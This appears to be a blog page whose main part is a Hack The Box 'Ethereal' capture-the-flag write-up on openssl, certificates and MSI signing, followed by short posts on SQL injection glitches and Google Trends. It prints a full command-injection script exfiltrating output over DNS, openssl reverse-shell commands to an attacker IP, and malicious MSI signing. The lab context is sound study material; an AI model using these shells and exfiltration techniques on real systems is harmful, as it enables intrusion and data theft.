Ethereal @ hackthebox: Certificate-Related Rabbit Holes

This post is related to the ‘insanely’ difficult hackthebox machine Ethereal (created by egre55 and MinatoTW) that was recently retired. Beware – it is not at all a full, comprehensive write-up! I zoom in on openssl, X.509 certificates, signing stuff, and related unnecessary rabbit holes that were particularly interesting to me – as somebody who recently described herself as a dinosaur supporting some legacy (Windows) Public Key Infrastructures, like the COBOL programmers tackling Y2K bugs.

Ethereal was insane because it was so locked down. You got limited remote command execution by exfiltrating the output of commands over DNS, via a ‘ping’ web tool with a command injection vulnerability. In order to use that tool you had to find credentials in a password box database that was hidden in an image of a DOS floppy disk buried among other files on an FTP server. See the excellent full write-ups by 0xdf and by Bernie Lim, or watch ippsec’s video.

For the DNS data exfiltration I owe a lot to m0noc’s great video tutorial: you parse the output of the command in a for loop and exfiltrate the data in chunks that make up a ‘host name’ sent to your evil DNS server. My RCE script is embedded below.
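On the receiving end, anything that logs DNS query names will do. A minimal sketch of such a listener (Python 3; parse_qname and serve are my own helper names, and real tooling like tcpdump or a proper DNS library works just as well):

```python
# Minimal exfil receiver sketch: log the queried name of every DNS query.
# Needs root to bind port 53; helper names are my own, not from the box.
import socket

def parse_qname(packet):
    """Read the queried name (a sequence of length-prefixed labels)
    that starts right after the fixed 12-byte DNS header."""
    labels = []
    i = 12
    while packet[i] != 0:
        length = packet[i]
        labels.append(packet[i + 1:i + 1 + length].decode('ascii', 'replace'))
        i += 1 + length
    return '.'.join(labels)

def serve(port=53):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(('0.0.0.0', port))
    while True:
        data, addr = sock.recvfrom(512)
        print(addr[0], parse_qname(data))
```

The exfiltrated chunks then show up as the labels of the queried ‘host name’.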

openssl – telnet-style

To obtain a reverse shell and to transfer files, you had to use openssl ‘creatively’ – as a telnet replacement, running a ‘double shell’ with different windows for stdin and stdout.

In order to trigger this shell as ‘the’ user – the one with the flag, named jorge – you needed to overwrite an existing Windows shortcut (.LNK) file pointing to the Visual Studio 2017 executable. I created ‘malicious’ shortcuts using the python library pylnk, on a Windows system. The folder containing that file was also the only place at all where you could write to the file system as the initial ‘web injection user’, alan. I noticed that the overwritten LNK was replaced quickly, at least every minute – so I also hoped that a simulated user would ‘click’ the file every minute.

Creating certificate and key …

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

Listening on the only ports open for outgoing traffic with two ‘SSL servers’:

openssl s_server -key key.pem -cert cert.pem -port 73
openssl s_server -key key.pem -cert cert.pem -port 136

The reverse shell command to be used in the LNK file uses the ‘SSL client’:

C:\windows\System32\cmd.exe /c "C:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.19:136 | cmd 2>&1 | C:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -connect 10.10.14.19:73 2>&1 &"

The first rabbit hole I fell into was that I used openssl more ‘creatively’ than was maybe needed. Though I found this metasploit module with a double telnet-style shell for Linux, I decided to work on replacing the LNK first, and to go for a reverse shell only once a simple payload in the LNK had worked.

Downside of that approach: I needed another way of transferring the LNK file! If I had had the reverse shell already, I’d have been able to use ‘half of it’ for transferring a file in the spirit of nc.

1) Run an ‘SSL server’ locally, prepared for sending the file:

openssl s_server -quiet -key key.pem -cert cert.pem -port 73 <to_be_copied

2) Receive it using the SSL client:

openssl.exe s_client -quiet -connect 10.10.14.19:73 >to_be_copied

The usual ways to transfer files were blocked – for example certutil. certutil and certreq are the tools that are sort of an equivalent of openssl on Windows. certutil’s legit purpose is to manage the Windows PKI: manage certificate stores, analyze certificates, publish to certificate stores, download certificate revocation lists, etc. The latter option makes it a ‘hacker tool’, because it lets you download arbitrary other files like wget or curl would (depending on the version of Windows and Defender’s vigilance doing heuristic checks of the action performed, rather than of the EXE itself).

Nearly missing out on openssl

When I saw openssl – installed on Windows! – I hoped I was on to something! However, I nearly let go of openssl as I failed to test it properly. I ran openssl help in my nslookup shell and did not get any response. Nearly every interesting EXE was blocked on Ethereal, so it came as no surprise that openssl seemed to be, too.

Only after I had been stuck for quite a while and a kind soul gave me a nudge not to abandon openssl too fast did I realize that the openssl help output is actually sent to standard error, not standard out.

You can redirect stderr to stdout using 2>&1 – but if you run the command ‘embedded’ in the for loop (see the python script below), you had better escape both special characters like this:

'C:\progra~2\openssl-v1.1.0\bin\openssl.exe help 2^>^&1'

File transfer with openssl base64 and echo

My solution was to base64-encode the file locally with openssl (rather than using base64, just ‘to play it safe’), to echo out the file in the DNS shell as alan on Ethereal, then base64-decode it and store it in the final location. I had issues with echoing out the full content in one line, so I did not use the -A option of openssl base64, but echoed one line after the other.

I had missed that I could write to the whole folder – I believed I could only write to this single LNK file. So I had to echo to the exact same file that I would also use as the final target, like so:

type target.lnk | openssl base64 -d -out target.lnk

Below is my final RCE script for a simple ‘shell’ – it either executes input commands 1:1 or runs special (series of) commands via shortcuts. E.g. for ‘echo-uploading’ a file, decoding it, and checking the result I used:

F shell.lnk
decode
showdir

In case I wanted to run a command without having to worry about escaping, I could also run it blind, without any output sent via nslookup.

Script rce.py

import requests
import readline
import os
import sys

url = 'http://ethereal.htb:8080/'
headers = { 'Authorization' : 'Basic YWxhbjohQzQxNG0xN3k1N3IxazNzNGc0MW4h' }

server_dns = '10.10.14.19'
A_dns = 'D%a.D%b.D%c.D%d.D%e.D%f.D%g.D%h.D%i.D%j.D%k.D%l.D%m.D%n.D%o.D%p.D%q.D%r.D%s.D%t.D%u.D%v.D%w.D%x.D%y.D%z.'  # one label per FOR /F token %a..%z
template = '127.0.0.1 & ( FOR /F "tokens=1-26" %a in (\'_CMD_\') DO ( nslookup ' + A_dns + ' ' + server_dns + ') )'
template_blind = '127.0.0.1 & _CMD_'
template_lnk = '( FOR /F "tokens=1-26" %a in (\'_CMD_\') DO ( nslookup ' + A_dns + ' ' + server_dns + ') )'
# CSRF protections not automated as they did not change that often
# Copy from Burp, curl etc.
postdata = { 
    '__VIEWSTATE' : '/wEPDwULLTE0OTYxODU3NjhkZG8se05Gp91AdhB+bS+3cb/nwM7/1XnvqTtUaEoqfbcF',
    '__VIEWSTATEGENERATOR' : 'CA0B0334',
    '__EVENTVALIDATION' : '/wEdAAMwTZWDrxbqRTSpQRwxTZI24CgZUgk3s462EToPmqUw3OKvLNdlnDJuHW3p+9jPAN/MZTRxLbqQfS//vLHaNSfR4/D4qt+Wcl4tw/wpixmG9w==',
    'ctl02' : ''
}

target_lnk = 'C:\Users\Public\Desktop\Shortcuts\Visual Studio 2017.lnk'
target_lnk_dos = 'C:\Users\Public\Desktop\Shortcuts\Visual~1.lnk'
target_dir = 'C:\Users\Public\Desktop\Shortcuts\\'

openssl_path = 'C:\progra~2\openssl-v1.1.0\\bin\openssl.exe'

ask = True

def create_echo(infile_name, outfile_path):
    
    # File name must not include blanks
    b64_name = infile_name + '.b64'

    echos = []

    if not os.path.isfile(infile_name):
        print 'Cannot read file!'
        return echos
    else:
        os.system('openssl base64 -in ' + infile_name + ' -out ' + b64_name)
        f = open(b64_name, 'r')
    
    i = 0
    for line in f:
        towrite = line[:-1]
        if i == 0:
            echos += [ 'cmd /c "echo ' + towrite + ' >' + outfile_path + '"' ] 
        else:
            echos += [ 'cmd /c "echo ' + towrite + ' >>' + outfile_path + '"' ] 
        print line[:-1]
        i += 1

    f.close()
    return echos

def payload(cmd):
    return template.replace('_CMD_', cmd)

def payload_blind(cmd):
    return template_blind.replace('_CMD_', cmd)

def send(payload):
    print payload
    print ''
    
    if ask == True:
       go = raw_input('Enter n for discarding the command >>: ')
    else:
       go = 'y'

    if go != 'n':
        postdata['search'] = payload
        response = requests.post(url, data=postdata, headers=(headers))
        print 'Status Code: ' + str(response.status_code)
    else:
        print 'Not sent: ' + cmd

while True:

    cmd = raw_input('\033[41m[dnsexfil_cmd]>>: \033[0m ')

    if cmd == 'quit': 
        break

    elif cmd == 'dontask':
        ask = False
        print 'ask set to: ' + str(ask)
    elif cmd == 'ask':
        ask = True
        print 'ask set to: ' + str(ask)

    elif cmd[0:2] == 'F ':
        infile = cmd[2:]
        echos = create_echo(infile, target_lnk_dos)
        link = ' & '
        cmd_all_echos = link.join(echos)
        send(payload_blind(cmd_all_echos))

    elif cmd[0:2] == 'B ':
        cmd_blind = cmd[2:]
        send(payload_blind(cmd_blind))
       
    elif cmd == 'decode':
        cmd = 'type "' + target_lnk + '" | ' + openssl_path + ' base64 -d -out "' + target_lnk + '"'
        send(payload_blind(cmd))

    elif cmd == 'showdir':
        cmd = 'dir ' + target_dir
        send(payload(cmd))

    elif cmd == 'showfile':
        cmd = 'type "' + target_lnk + '"'
        send(payload(cmd))

    else:
        send(payload(cmd))

Finding that elusive CA certificate

After I finally managed to run a shell as jorge I fell into lots of other rabbit holes – e.g. analyzing, modifying, and compiling a recent Visual Studio exploit.

Then I ran tasklist for the umpteenth time, and saw an msiexec process! And lo and behold, even my user jorge was able to run msiexec! This fact was actually not important, as I found out later that I had to wait for another (admin) user to run something.

I researched ways to use an MSI for applocker bypass. As described in detail in other write-ups you could use a simple skeleton XML file to create your MSI with the WIX toolset. WIX was the perfect tool to play with at Christmas when I did this box – it’s made up of executables called light.exe, candle.exe, lit.exe, heat.exe, shine.exe, torch.exe, pyro.exe, dark.exe, melt.exe … :-)

So I also created a simple MSI and ran it as jorge – and nothing happened. Honestly, I cannot tell with hindsight if that should have worked – just without any escalation to an admin or SYSTEM context – or if I made an error again. But because of my focus on all things certificates and signatures, I suspected the MSI had to be signed – that would also be in line with the spirit of downlocking on this box.

Signed code only runs if the certificate is trusted. So I needed to sign the MSI either with a ‘universally’ / publicly trusted certificate (descending from a CA certified in the Microsoft Root Program), or there was possibly a key and certificate on the box that I had not found yet. Both turned out to be another good chance for falling into rabbit holes!

Testing locally with certificates in the Windows store

I used one of my Windows test CAs and issued a Code Signing certificate, then used signtool to sign a test MSI. The reference to the correct certificate in the store is in this case the CN of the Subject Name, which should be unique in your store:

signtool sign /n Administrator /v pingtest.msi

The MSI could be ‘installed’ and my ping worked on a test Windows box. So I knew that the signing procedure worked, but I needed a certificate chain that Ethereal would trust. With hindsight, given my false assumption that jorge would run the MSI, I should also have considered having jorge install a Root CA certificate of my liking into his (user’s) Root certificate store. It should theoretically be doable by fiddling with the registry only (see the second hilarious rabbit hole below), but normally I would use certutil for that. And certutil was definitely blocked.

Publicly trusted certificate

I do have one! Our Austrian health insurance smartcards have pre-deployed keys, and you can enroll for X.509 certificates for those keys. So on a typical Windows box, code signed with this ID card would run. But there is a catch: Windows does not – anymore, since Vista if I recall correctly – pre-populate the store with all the Root CAs certified by Microsoft. If you try to run a signed MSI (or visit an HTTPS website, or read a signed e-mail), then Windows will download the required root certificate as needed. But hackthebox machines are not able to access the internet.

Yet, in despair I tried, for the unlikely case that all the roots were there. Using signtool like so, it let me pick the smartcard certificate, and I was prompted for the PIN:

signtool sign /a /v pingtest.msi

So if my signed MSI had screwed up the box, I could not have denied it – a use case of the Non-Repudiation Key Usage ;-)

Uploaded my smartcard-signed MSI. And failed to run it.

Ages-old Demo CA – and how to use openssl for signing

There was actually a CA on the box, sort of – the demoCA that comes with the openssl installation. A default CA key and certificate come with openssl, and the perl script CA.pl can be used to create ‘database-like’ files and folders. In despair I used this default CA certificate and key – maybe it was trusted as a kind of subtle joke? I did not bother to look closely at the CA certificate – otherwise I would have noticed it had expired long ago :-)

The process I tested for signing was the same one I used later. As makecert is the tool that many others have used to solve this, I quickly sum up the openssl process.

You can use either the openssl ca ‘module’ or openssl x509. The latter is a bit simpler, as you do not need to prepare the CA’s ‘database’ directories.

Of course I used Windows GUI tools to create the request :-)

  • Start, Run, certmgr.msc
  • Personal, All Tasks, Advanced Operations, Create Custom Request
  • Custom PKCS#10 Request.
  • Extensions:
    Key Usage = Digital Signature
    Extended Key Usage = Code Signing
  • Private Key, Key Options: 2048 Bit
  • BASE64 encoding

The result is a BASE64 encoded ‘PEM’ certificate signing request. You can sign with the demoCA’s key like this – I did this on my Windows box.

openssl x509 -req -in req.csr -CA cacert.pem -CAkey private\cakey.pem -CAcreateserial -out codesign.crt -days 500 -extfile codesign.cnf -extensions codesign

There are different ways to make sure that the Code Signing Extended Key Usage gets carried over from the request to the certificate, or that it is ‘added again’. In the openssl.cnf config file (the default one, or one referenced via -config) you can e.g. configure copy_extensions.

In the example above, I used a separate file for extensions. (Values seem to be case-sensitive, also on Windows).

[ codesign ]

keyUsage=digitalSignature
extendedKeyUsage=codeSigning

To complete the process, the Root CA certificate is imported into the Trusted Root Certification Authorities store in certmgr.msc, and the Code Signing certificate is imported into Personal certificates in certmgr.msc. In case the little key icon does not show up, key and certificate have not been properly united, which can be fixed with

certutil -repairstore -user my [Serial Number of the cert]

The file is signed without issues; however, the resulting chain violates basic requirements for certificate path validation: the CA’s end of life was in 1998.

certutil cacert.pem

X509 Certificate:
Version: 1
Serial Number: 04
Signature Algorithm:
Algorithm ObjectId: 1.2.840.113549.1.1.4 md5RSA
Algorithm Parameters:
05 00
Issuer:
CN=SSLeay/rsa test CA
S=QLD
C=AU
Name Hash(sha1): 4f28bdc33fb78c854e2ceb26210f981bb73ce9ea
Name Hash(md5): ee7084bbed50615d1e118ff2ada590cf

NotBefore: 10.10.1995 00:32
NotAfter: 06.07.1998 00:32

Subject:
CN=SSLeay demo server
OU=CS
O=Mincom Pty. Ltd.
S=QLD
C=AU

Weird way to find a CA certificate

This was – for me – the most hilarious part of owning this box. The mysterious Root CA had to be in the Windows registry, and I had no certutil. So I resorted to looking at the registry directly.

‘Windows certificate stores’ are collections of different registry keys; this was the one relevant here:

C:\>reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85
....

But I wanted to look into the binary certificates stored under those keys, so I dumped each of the keys (like 18F7C1FCC3090203FD5BAA2F861A754976C8DD25) and copied the contents from the terminal into a python script. This snippet shows only a single cert in the list:

certs = [
...
'190000000100000010000000E53D34CECB05C17EE332C749D78C02560F000000010000001000000065FC47520F66383962EC0B7B88A0821D03000000010000001400000018F7C1FCC3090203FD5BAA2F861A754976C8DD2509000000010000000C000000300A06082B060105050703080B000000010000003400000056006500720069005300690067006E002000540069006D00650020005300740061006D00700069006E00670020004300410000001400000001000000140000003EDF290CC1F5CC732CEB3D24E17E52DABD27E2F02000000001000000C0020000308202BC3082022502104A19D2388C82591CA55D735F155DDCA3300D06092A864886F70D010104050030819E311F301D060355040A1316566572695369676E205472757374204E6574776F726B31173015060355040B130E566572695369676E2C20496E632E312C302A060355040B1323566572695369676E2054696D65205374616D70696E67205365727669636520526F6F7431343032060355040B132B4E4F204C494142494C4954592041434345505445442C20286329393720566572695369676E2C20496E632E301E170D3937303531323030303030305A170D3034303130373233353935395A30819E311F301D060355040A1316566572695369676E205472757374204E6574776F726B31173015060355040B130E566572695369676E2C20496E632E312C302A060355040B1323566572695369676E2054696D65205374616D70696E67205365727669636520526F6F7431343032060355040B132B4E4F204C494142494C4954592041434345505445442C20286329393720566572695369676E2C20496E632E30819F300D06092A864886F70D010101050003818D0030818902818100D32E20F0687C2C2D2E811CB106B2A70BB7110D57DA53D875E3C9332AB2D4F6095B34F3E990FE090CD0DB1B5AB9CDE7F688B19DC08725EB7D5810736A78CB7115FDC658F629AB585E9604FD2D621158811CCA7194D522582FD5CC14058436BA94AAB44D4AE9EE3B22AD56997E219C6C86C04A47976AB4A636D5FC092DD3B4399B0203010001300D06092A864886F70D01010405000381810061550E3E7BC792127E11108E22CCD4B3132B5BE844E40B789EA47EF3A707721EE259EFCC84E389944CDB4E61EFB3A4FB463D50340B9F7056F68E2A7F17CEE563BF796907732EB095288AF5EDAAA9D25DCD0ACA10098FCEB3AF2896C479298492DCFFBA674248A69010E4BF61F89C53E593D1733FF8FD9D4F84AC55D1FD116363',
....
]
for cert in certs:
    print '======================================='
    print cert
    print '======================================='
    print cert.decode('hex')
    print '======================================='

OK, certainly not the most elegant way to deal with it, but I was losing patience – I was on the war path!!
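With hindsight, a slightly less brutal approach would have been to carve the DER-encoded certificate out of each registry blob programmatically. A hedged sketch (Python 3; carve_der_cert is my own helper name, and it assumes – as in the dump above – that the certificate is the last property in the blob):

```python
# Carve the DER certificate out of a registry value dump (hex string).
# Assumption: the cert is the blob's final property, so its DER SEQUENCE
# header (0x30 0x82 <two length bytes>) plus body ends exactly at the end.
def carve_der_cert(blob_hex):
    blob = bytes.fromhex(blob_hex)
    i = blob.find(b'\x30\x82')          # first plausible SEQUENCE header
    while i != -1:
        length = int.from_bytes(blob[i + 2:i + 4], 'big')
        if i + 4 + length == len(blob): # header + body reach the blob's end
            return blob[i:]
        i = blob.find(b'\x30\x82', i + 1)
    return None
```

The carved bytes could then be fed to openssl x509 -inform der for proper decoding.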

Strings in the output contain the CA’s Issuer and Subject Name, and most were familiar – Microsoft, VeriSign, etc. With this exception:

=======================================
¬·╟<          òë┌┐ò$º¿Y╔&┌╢e½s╦π≥│τÇ╤#w▌╙o╠D       ╖è╔└eîqD╕ß!└öPδ⌠ ¡      ü¿M»╬Φv√tÄ.LgawĽ0ß       τ9╡ïε╢æï
  é0é010 U  My CA0é"0≥▀~àE~Γ<éíFj0
é ¥═p|ÉÉ▒ôfD╬,°á3╣Zƒ╕Cáφs╖Kεmìδ╗wFo2ßÄK ┘Xì╧Y?ÉR╢&,V┘Ω╠û5¬Σ▒┴Γ╧B·Gb4éτåi0Ku rí╕Oh≈φ¬u≤h¥J ┌┌º(┐Jk<√=-9{£H[▀ªP&«¢ΣU■2~ ½Öº-4║o/σ£oºå─∙Åédü¿éÅêr▐O.╘<'Qu∙w0~▒A±·â·{k
  é hòÿâ⌠╝*εC╡Åπs⌠╝[░╣±kπ{≥¬æ±¬╠b┐╤GëJ»i%┴       ╕ìiΦπ %¬*π[ò╗,9ü:╦-5  úV0T0 U  0  0A U :08ǽÖ┬ï]═8¬I¡X^⌠í010 U  My CAé÷h≥▀~àE~Γ<éíFj0

▀ó*┌û╞Qfè£ⁿ─;Lτ·II╫─╓┴¼╤N∩j Φ
)x═Mπ╪₧⌠ç╛ê┤YF:╛╢╙êDτσªM]Gá⌐ S≡∞Yg J»╪u

...

Maybe hard to spot, but there was a CA called My CA! But where was the key I needed to sign my own Code Signing cert?

In such cases I typically resort to more Windows registry forensics. I hoped that jorge or the box’s creators had touched a folder with this certificate and key. I walked through various Explorer-related keys, especially the infamous Shellbags:

HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2
    NodeSlot    REG_DWORD    0x3
    MRUListEx    REG_BINARY    0100000000000000FFFFFFFF
    0    REG_BINARY    4A00310000000000DB4CD6B3100044455600380009000400EFBEDB4C8FB3DB4CD6B32E0000002400000000000100000000000000000000000000000099306500440045005600000012000000
    1    REG_BINARY    5000310000000000E74C4AAE10004365727473003C0009000400EFBEE74C41AEE74C4AAE2E000000492E0000000003000000000000000000000000000000EAE7BD0043006500720074007300000014000000

HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\1

… and I really saw a folder called Certs after decoding:

>>> print s.decode('hex')
n 1     µLGu VISUAL~1  V          ∩╛µLGuµLGu.   z¿                    åUÉ V i s u a l   S t u d i o   2 0 1 7   
>>> s='4A00310000000000DB4CD6B3100044455600380009000400EFBEDB4C8FB3DB4CD6B32E0000002400000000000100000000000000000000000000000099306500440045005600000012000000'
>>> print s.decode('hex')
J 1     █L╓│ DEV 8        ∩╛█LÅ│█L╓│.   $                    Ö0e D E V   
>>> s='5000310000000000E74C4AAE10004365727473003C0009000400EFBEE74C41AEE74C4AAE2E000000492E0000000003000000000000000000000000000000EAE7BD0043006500720074007300000014000000'
>>> print s.decode('hex')
P 1     τLJ« Certs <      ∩╛τLA«τLJ«.   I.                    Ωτ╜ C e r t s    >>>

… and a link to a folder called MSIs:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\Folder
    0    REG_BINARY    5000750062006C0069006300000060003200000000000000000000005075626C69632E6C6E6B0000460009000400EFBE00000000000000002E00000000000000000000000000000000000000000000000000000000005000750062006C00690063002E006C006E006B0000001A000000
    MRUListEx    REG_BINARY    020000000100000000000000FFFFFFFF
    1    REG_BINARY    4D0053004900730000005A003200000000000000000000004D5349732E6C6E6B0000420009000400EFBE00000000000000002E00000000000000000000000000000000000000000000000000000000004D005300490073002E006C006E006B00000018000000
...
>>> s='4D0053004900730000005A003200000000000000000000004D5349732E6C6E6B0000420009000400EFBE00000000000000002E00000000000000000000000000000000000000000000000000000000004D005300490073002E006C006E006B00000018000000'
>>> print s.decode('hex')
M S I s   Z 2           MSIs.lnk  B        ∩╛        .                             M S I s . l n k   
>>> 
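The manual decode('hex') squinting can be automated a little. A sketch (Python 3; skim_strings is my own helper name) that pulls both the ANSI and the UTF-16LE strings out of such a blob:

```python
# Skim readable names out of a shellbag-style REG_BINARY hex dump:
# shell items carry both an ANSI (8.3) and a UTF-16LE long name.
import re

def skim_strings(blob_hex, min_len=4):
    blob = bytes.fromhex(blob_hex)
    # runs of printable ASCII bytes (the short / 8.3 name)
    ansi = re.findall(rb'[\x20-\x7e]{%d,}' % min_len, blob)
    # runs of printable-char + NUL pairs (the UTF-16LE long name)
    wide = re.findall(rb'(?:[\x20-\x7e]\x00){%d,}' % min_len, blob)
    return ([b.decode('ascii') for b in ansi] +
            [w.decode('utf-16-le') for w in wide])
```

Running it on the REG_BINARY value above yields Certs twice – once from the 8.3 name, once from the Unicode name.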

Then I did what I should have done before – checking out the Recent Docs folder directly …

Directory of C:\Users\jorge\AppData\Roaming\Microsoft\Windows\Recent

07/07/2018  09:47 PM               405 EFS.lnk
07/07/2018  09:53 PM               555 MSIs.lnk
07/07/2018  09:53 PM               678 note.lnk
07/07/2018  09:49 PM               690 Public.lnk
07/09/2018  09:13 PM               612 system32.lnk
07/04/2018  09:17 PM               527 user.lnk

… the file MSIs.lnk contained the path:

...
D:\DEV\MSIs
...

So there was a D: drive I had totally missed – and there you found a key MyCA.pvk and a certificate MyCA.cer.

The ‘funny’ thing now is that the LNK file hijacked before pointed to Visual Studio installed on the D: drive. So the intended way was likely to go straight to this folder, see the Certs and MSIs folders, and conclude you need to sign an MSI.

Signing that darn thing finally :-)

I wanted to re-use the openssl process I had tested before. But openssl cannot use PVK files (AFAIK ;-)) – however, you can convert PVK keys to PFX (PKCS#12).

I ran

pvk2pfx /pvk MyCA.pvk /spc MyCA.cer

… to start a GUI certificate export wizard that let me specify the PFX password.

Then I converted the PFX key to PEM

openssl pkcs12 -in MyCA.pfx -out MyCA.pem -nodes

… and the binary (‘DER’) certificate to PEM

openssl x509 -inform der -in MyCA.cer -out MyCA.cer.pem

I issued a Code Signing certificate to a user with CN Test 1 (same process as with the demoCA), and used this to sign the final payload! I imported MyCA.cer into the Trusted Roots and again referenced the CN of the user in signtool:

signtool sign /n "Test 1" /v half_shell_MyCA.msi
The following certificate was selected:
    Issued to: Test 1
    Issued by: My CA
    Expires:   Sat May 09 14:54:50 2020
    SHA1 hash: 0CDBA139B0E93813969E9E82F1E739C962BA6A3B

Done Adding Additional Store
Successfully signed: half_shell_MyCA.msi

Number of files successfully Signed: 1
Number of warnings: 0
Number of errors: 0

I also verified the MSI with

signtool verify /pa /v half_shell_MyCA.msi

My final signed MSI payload was what I called a half shell – a command like this:

C:\windows\System32\cmd.exe /c "C:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.19:136 | cmd &"

You can execute commands, but you do not get the output back. I tried to use my resources most efficiently.

A text note told us that the admin rupal would test MSIs frequently. So I needed one openssl listener – thus one of the two precious open ports – to wait for rupal.

I used the other open port for uploading the MSI, ‘nc-style’ again with openssl.

But if I really wanted output from the blind half shell, I could also embed the command in nslookup. So I used rce.py to create this type of command (for that it has an option to just display, but not run, a command), which I would then paste into the input window of jorge’s half shell.

FOR /F "tokens=1-26" %a in ('copy half_shell_MyCA.msi D:\DEV\MSIs') DO ( nslookup D%a.D%b.D%c.D%d.D%e.D%f.D%g.D%h.D%i.D%j.D%k.D%l.D%m.D%n.D%o.D%p.D%k.D%r.D%s.D%t.D%u.D%v.D%w.D%x.D%y.D%z. 10.10.14.19)

And rupal called back!

\o/

But he also had only half a shell, so I read root.txt via nslookup, pasting this command into his half shell:

FOR /F "tokens=1-26" %a in ('type C:\Users\rupal\Desktop\root.txt') DO ( nslookup D%a.D%b.D%c.D%d.D%e.D%f.D%g.D%h.D%i.D%j.D%k.D%l.D%m.D%n.D%o.D%p.D%k.D%r.D%s.D%t.D%u.D%v.D%w.D%x.D%y.D%z. 10.10.14.19)

What an adventure!

Ethereal-owned

Unintended 2nd Order SQL Injection

Why I am not afraid of the AI / Big Data / Cloud powered robot apocalypse.

SQL injection means to run custom SQL queries through web interfaces because the input to the intended query is not sanitized – like appending the infamous ‘ OR ‘1’=’1 to a user name or search term. It is 2nd order when the offending string comes from the database, not directly from user input: you would, for example, register a new user named admin ‘ OR ‘1’=’1. If you want to play with that, register at hackthebox.eu, download sqlmap, and write your own Python scripts.
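The second-order idea fits in a few lines of sqlite3 – a toy schema of my own, nothing from the box: registration stores the evil name safely via parameters, but a later feature concatenates the stored name into a query.

```python
# Toy demo of 2nd-order SQL injection (my own schema, for illustration).
import sqlite3

db = sqlite3.connect(':memory:')
db.execute("CREATE TABLE users (name TEXT, secret TEXT)")
db.execute("INSERT INTO users VALUES (?, ?)", ("alice", "s3cret"))

# Registration uses bound parameters, so this evil name is stored verbatim:
evil = "nobody' OR '1'='1"
db.execute("INSERT INTO users VALUES (?, ?)", (evil, "none"))

# Second-order sink: a later query is built from the *stored* name.
name = db.execute("SELECT name FROM users WHERE secret='none'").fetchone()[0]
rows = db.execute("SELECT secret FROM users WHERE name='%s'" % name).fetchall()
print(rows)   # the OR '1'='1' smuggled in via the stored name leaks every secret
```

The first INSERT was perfectly safe; the vulnerability only materializes in the second, string-built query.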

I have accepted a benign version of 2nd order SQL injection as a fact of life. Our company name has an ampersand in it, and now and then the company name gets truncated at the ampersand. Very cautious IT systems don’t even accept this hacker company name.

But it seems the (AI / Big Data / cloud powered) security filters get better and better. A parcel service messed up delivery in an interesting way:

Item 1 was delivered to a wrong address – not related to us in any way, but the contact’s first name was in the street name.

Item 2 was delivered to us, but the company name was truncated to a single word – the contact’s last name right before the ampersand.

Was this the time some backend systems got an update of their security filters? I also got a purchase order e-mail without an actual PO attachment, but the company name was truncated at the ampersand.

Maybe it also helps that our location’s zip code changed three years ago. Hardly any organization could deal with the change without support tickets and hacks – big US-based data krakens as well as local suppliers. This will take a while – our IT department will have to set up your new zip code! … says the company whose core business is shipping things, months after the release of the new zip code.

Google support was helpful, but it took a lot of back and forth to get the zip code corrected in Google Maps. In the beginning they added the new zip code to the street address as a workaround. The location shows the old code to this day – we are the only place with the ‘new’ ZIP code.

Making fun of these glitches is unfair. You notice the exceptional error rather than the many digital processes that run flawlessly. As a network administrator you know this: people only notice you if things go wrong.

However, I’d appreciate if companies would be more humble. Every time I fight with a weird glitch in Big Corp’s systems I see their marketing messages on social media about this superior digital experience.

But …

Software and cathedrals are much the same – first we build them, then we pray
— Samuel T. Redwine Jr. [ref]

 

We build our computer (systems) the way we build our cities: over time, without a plan, on top of ruins.
— Ellen Ullman [ref]

 

Cyber Something

You know you have become a dinosaur when you keep using outdated terminology. Everybody else uses the new buzzword, but you just find it odd. But someday it will creep into your active vocabulary, too. Then I will use the tag cyber something, like stating that I work with cyber-physical systems.

But am I even right about the emergence of new terms? I am going to ask Google Trends!

I have always called it IT Security; now it is Cyber Security. I know there are articles written about the difference between Cyber Security and IT Security. However, when I read about Those 10 Important Things in Cyber Security, I see that the term is often used as a 1:1 replacement for what had been called IT Security. And even if you insist on them being different fields, the following Google Trends result would at least show that one has become more interesting to internet users.

I am also adding Infosec, which I feel is also more ‘modern’ – or maybe only used specifically by community insiders.

cyber-security-it-security-infosec

Link: https://trends.google.com/trends/explore?date=today%205-y&q=Cyber%20Security,IT%20Security,Infosec

So Cyber Security is on the rise, but IT Security is not yet in decline. Infosec is less popular – and what about these spikes?

infosec

Link: https://trends.google.com/trends/explore?date=today%205-y&q=Infosec

This is not what I expected – a sharp peak at the beginning of every June! This pattern rather reminds me of searching for terms related to heating systems: searches for heat pump peak in New Zealand every July – for obvious reasons. (Although it is interesting why only in NZ – I only zoomed in on NZ as it was the top region in the worldwide search for heat pump … but I digress!)

So I guess the spike is caused by one of the famous big infosec conferences? Which one? I could not track it down unambiguously!

What about the non-abbreviated term, Information Security? Does it exhibit the same pattern?

information-security-infosec.png

Link: https://trends.google.at/trends/explore?date=today%205-y&q=Infosec,Information%20Security

Not at all. There is one negative spike in week 51 every year, and this pattern rather reminds me of the ‘holiday pattern’ I see in our websites’ statistics. Maybe that’s the one week in a year when infosec people are on vacation, too?

Finally I want to cross-check the Cyber Physical and The Cyber in general:

Cyber Physical is not mainstream enough to show a trend…

cyber-physical

Link: https://trends.google.com/trends/explore?date=today%205-y&q=Cyber%20Physical

… and Cyber itself is again not at all what I expected!

cyber.png

Link: https://trends.google.com/trends/explore?date=today%205-y&q=Cyber

In mid-December every year we all search for The Cyber! Do the hackers attack every year when we are busy shopping for presents or getting That Important Project done before the end of the calendar year?

Again I fail to google that one and only Cyber event in December – or maybe these spikes are all about Google bugs!

Epilogue / user manual: Don’t click on these links too often!

